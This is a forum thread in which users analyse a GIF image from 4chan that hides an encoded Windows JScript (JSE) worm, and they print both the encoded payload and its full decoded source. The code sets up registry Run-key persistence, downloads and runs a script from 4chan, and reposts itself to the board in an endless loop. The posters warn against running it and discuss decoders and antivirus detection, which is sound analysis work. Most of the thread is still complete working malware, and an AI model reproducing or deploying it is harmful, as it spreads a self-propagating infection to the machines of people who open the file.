Irongeek

Obfuscated Javascript in a JSE in an Image

7 posts in this topic

Ok, I found these images on 4chan that have encoded javascript in them, you have to safe the gif as a jse to run them (but don't!!!, I'm just uploading the images so you can see what they are). Exactly how is this encoded, and can anyone tell what it does? This seems to be the script part:

GIF89aI	=	"x1!þ÷";
#@~^pwkAAA==-mD~XtMP',xAPzmOk7+p6(L+1O`rH/Xhs c(tSuKPKr#I@#@&-lMPd4VV~x,xnh,)1Yr7+or4N+1O`rjmMk2Oc?tsVr#i@#@&-lMP6/GPx~ +APz^Yb\np}4Ln^D`E?1.bwObxTRsbVjXkYn:}4%n1YJ*I@#@&\lM~r+,',xnh~)1Yr\pr(Ln^D`J(UD+.xOA62^WM+Dcba2VbmCYbWUE*i@#@&@#@&r‰Ji@#@&dtV^R^E..xOfb.+1YG.HP'~WkW oOUwn1kmVsKV9nDv bi@#@&d4VVc.E `J1h[PJm,mGwz~'JEP3~UC d1Dk2OwEsVgCs+~3Pr-J,/HdRN/nJ*i@#@&DDX,`@#@&JûJp@#@&P,P,/4+sscDnoq.kD+cE_|Ziw'?G0DAmDn'-tkmMWkG0D-wbx[GS/-'/EMD+ O#+M/bWU-w]!xw-kz/N/nEBPJAd1DrwD~J4~rP3P0kWcL+D?2+1kCswWV9nDv #,Q~J'-kXdR%dJbi@#@&8,mCO1t`nb, N@#@&@#@&h4bV`F*PP~YMX~ @#@&@#@&,PP,atMRWanU`roYE~~E4YOw=&zb:L WmtCUcW.oJ8JJS,!*i@#@&JörI@#@&P~P,64.c/+D]+$E+kOu+mNDcJ(W HGNbWkNRjbxmnEBPU+S~GlO`Z##p@#@&~P,PatMRdn N`*I@#@&PP,~-lMPalL+~x,64Dc.+kwGUk+KnaDi@#@&@#@&,P~,YMXPP@#@&~P,P~P,Pa4MRWanxvJoOE~,wmonRhCDm4`J@!l,t.n6'Jc4DY2)'&'zrso'Rc1tmU-cW.o'z8wJ/D1wz'N_' Rc#J#,FDS,!bi@#@&Jèri@#@&,PP~~,P~64.c/n Nv#i@#@&,~P,P~P,\C.,k:,xP +h,)^Yb\(64%n1YcJz[W94 jDD+Chr#I@#@&~,P~,P,PksRsGNPxP2i@#@&,PP,~P,Pks OXa+,'~FI@#@&P~P,~P,PrhcWwnUv#I@#@&~,P~,P,PksRS.kD+c64D ./wKU/AW9zbi@#@&,P~P~~,Pr:cdl7+PGwkVncrL Lknr~~y#p@#@&rÿJp@#@&,P~P,P~~kt+^sRMExvEA/1DbwOP&8,L LknJ*i@#@&,PP~N,mCY14v+b, )@#@&@#@&,~P,\CD,4[.HP',cJr_HmO4RMl NG:cb*RdE(dYM`+bp@#@&~~,P-lM~4+C9P{PJ'D'UO J~_,4[.HP_,E-M-x;GUYxDO9kd2K/rYbGx=PWGM:O[CDlIP Cs+xri@#@&@#@&P,~P7l.Pal.O8P',W/KRWanUK6DsrVncrXE~,+~,FbI@#@&JÓEI@#@&~P,~al.DFchDbYctl[P3PE./YKwD'x-MwUJ,_,wCon slOm4cz@!/2C Pk[xrxGY4.l[v-9_#J#]qT,_~tl[~3PJ!20bV+p~Wk^+ lh+xCcor0'.- -.w J#I@#@&P~P,2mDO8R1VWk+vbi@#@&@#@&,P~~7lD,2lMY ,x~0kWcW2+UP6Osbs+vJ"EBP S~8#I@#@&Eúri@#@&P,PPalMO ch.kD+ccrJ_tCY4RDmU[Ws`*# /;8kY.`ybP3P4nmNPQ~r:GNwM-U'D'xDobdY'Dwx OE~3P49.X,_PrRR-M- Jbi@#@&,P~PaCDD ^^W/nc*i@#@&@#@&,P~,/4+V^RM;xvJ^:9P&^,mWazPJ4PHQdXkRN/n_"~aJSPZSP8#I@#@&@#@&~~,P-lM~aWdDP{Pxh,)mDk-+or8%mYvEb9WN( jYM+m:E#I@#@&JÙEi@#@&P,P~2K/Y hKNnP{~2i@#@&P,PPaWkORDX2+,'~qp@#@&,~P,wWkO Wa+ `bi@#@&,P~PaG/DRsGmNs.GssrVcrwE*i@#@&@#@&P,~PDDzPP@#@&~,PP,~P,k+cUC\bomYn`E4DY2)J&kso *1tlU KDLz(&r#I@#@&,PP,P,~P9W~ @#@&~~,PP,~P,PP, jCc/^+nwcqZ!bi@#@&JÅri@#@&,PP~~,P~8,A4ksPvk+cDCNH?OlD+~Z{Pc*I@#@&PP,~~P,Pb+ /OGa`bi@#@&P,P~~,PPrncNGm!hxOcmKW3b+,xPrxA/|/Oz^+'p~+XwkMnd'rP3PU+A~GlO+vT#,_~EpPwCO4'&i,[K:Cbx{Rc1tmURKDLJp@#@&~,PP)~mmYm4cn#, )@#@&@#@&Eöri@#@&,~P,64.cWwnUvJ2WkOr~~rtDYw=zJ[lDR*m4lU KDoJ8zb:o(GCD9Rat2JS~Z#I@#@&~P,Pa4MR/nO"+5EdDCnmND`rZKUYxOO:X2nr~PrhE^YkaC.YJ0KDhO[CDlIP(GE NC.H'J~Q,4[DHbp@#@&,P,P64Dcd+ NcwK/Obp@#@&@#@&P,PPqjuRkV+2`XTZ!T#p@#@&@#@&N~1lY^4v+bPPN,8@#@&VKACAA==^#~@

post-1168-1234036539_thumb.png

post-1168-1234036579_thumb.png

0

Share this post


Link to post
Share on other sites

yeah this has been a yellow square, a red square, a non working image etc.

i've seen tuts on how to decode it using http://www.virtualconspiracy.com/index.php...e=/scrdec/intro .

Hiding javascript in gif images has been around for a while though, I myself have seen it on ha.ckers.org quite a while ago.

//edit

Interesting, removing the first part* of either gif file, made my virusscanner delete the file saying it was a trojan horse "VBS/Psyme".

*first part:

GIF89aI	=	"x1!þ÷";

Edited by DanielG
0

Share this post


Link to post
Share on other sites

I wondered what it was encoded with, Byte_Bucket from Pauldotcom pointed me at a tool called "Windows Script Encoder" from Microsoft that seems to be what was used.

The encoded part seems to start with #@~^ , which is also what the MS tool makes.

The encoder is here: Windows Script Encoder

http://www.microsoft.com/downloads/details...;displaylang=en

0

Share this post


Link to post
Share on other sites

Ok, this tool:

http://www.virtualconspiracy.com/content/scrdec/download

which I found out about here:

http://www.aspheute.com/english/20011123.asp

can decode it.

Here is the contents:

GIF89aI	=	"x1!þ÷";
var xhr = new ActiveXObject("Msxml2.XMLHTTP");
var shell = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var ie = new ActiveXObject("InternetExplorer.Application");

"‰";
shell.currentDirectory = fso.getSpecialFolder(2);
shell.run("cmd /c copy \"" + WSH.scriptFullName + "\" sys.jse");
try {
"û";
shell.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\sysjse", "wscript /b " + fso.getSpecialFolder(2) + "\\sys.jse");
} catch(e) {}

while(1) { try {

xhr.open("get", "http://img.4chan.org/b/", 0);
"ö";
xhr.setRequestHeader("If-Modified-Since", new Date(0));
xhr.send();
var page = xhr.responseText;

try {
xhr.open("get", page.match(/<a href="(http:\/\/img\.4chan\.org\/b\/src\/\d+\....)/)[1], 0);
"è";
xhr.send();
var im = new ActiveXObject("Adodb.Stream");
im.mode = 3;
im.type = 1;
im.open();
im.write(xhr.responseBody);
im.saveToFile("j.jse", 2);
"ÿ";
shell.run("wscript /b j.jse");
} catch(e) {}

var bdry = (""+Math.random()).substr(2);
var head = "\r\n--" + bdry + "\r\nContent-Disposition: form-data; name=";

var part1 = fso.openTextFile("y", 2, 1);
"Ó";
part1.write(head + "resto\r\n\r\n" + page.match(/<span id="nothread(\d+)/)[1] + head + "upfile; filename=a.gif\r\n\r\n");
part1.close();

var part2 = fso.openTextFile("z", 2, 1);
"ú";
part2.write((""+Math.random()).substr(2) + head + "mode\r\n\r\nregist\r\n--" + bdry + "--\r\n");
part2.close();

shell.run("cmd /c copy /b y+sys.jse+z p", 0, 1);

var post = new ActiveXObject("Adodb.Stream");
"Ù";
post.mode = 3;
post.type = 1;
post.open();
post.loadFromFile("p");

try {
ie.navigate("http://img.4chan.org/b/");
do {
WSH.sleep(100);
"Å";
} while (ie.readyState != 4);
ie.stop();
ie.document.cookie = "nws_style=; expires=" + new Date(0) + "; path=/; domain=.4chan.org";
} catch(e) {}

"ö";
xhr.open("post", "http://dat.4chan.org/b/imgboard.php", 0);
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + bdry);
xhr.send(post);

WSH.sleep(50000);

} catch(e) {} }

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now